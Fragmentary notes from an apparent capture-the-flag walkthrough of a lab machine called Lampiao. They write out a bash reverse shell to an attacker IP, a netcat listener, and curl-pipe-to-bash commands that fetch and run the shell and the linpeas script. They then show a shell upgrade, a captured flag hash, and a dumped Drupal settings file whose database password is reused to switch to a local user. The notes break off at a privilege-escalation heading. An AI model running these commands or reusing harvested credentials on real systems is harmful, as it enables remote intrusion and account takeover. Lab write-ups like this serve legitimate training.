Creating a local shell file

vim index.html
 
bash -i >& /dev/tcp/192.168.45.249/1234 0>&1

Download and executing the shell

nc -lvnp 1234
 
curl http://192.168.45.249/index.html | bash

Upgrading the shell

python3 -c 'import pty; pty.spawn("/bin/bash")'

Local.txt

www-data@lampiao:/home/tiago$ cat local.txt
cat local.txt
d9eae6cd1347fa92c991fb4385a352ac

Running Linpeas

curl http://192.168.45.249/linpeasn.sh | bash
 
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => array(
 *   'prefix' => array(
 *     'driver' => 'mysql',
 *     'database' => 'databasename',
 *     'username' => 'username',
 *     'password' => 'password',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'username',
 *     'password' => 'password',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
      'database' => 'drupal',
      'username' => 'drupaluser',
      'password' => 'Virgulino',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
 *   $drupal_hash_salt = file_get_contents('/home/example/salt.txt');
$drupal_hash_salt = 'Mky3HW4JeKcETD2HWg8pCOyDvXGqo2MZyVkDpnw974M';

Password for tiago

Virgulino
 
su tiago
Virgulino

Priv Esc

^247959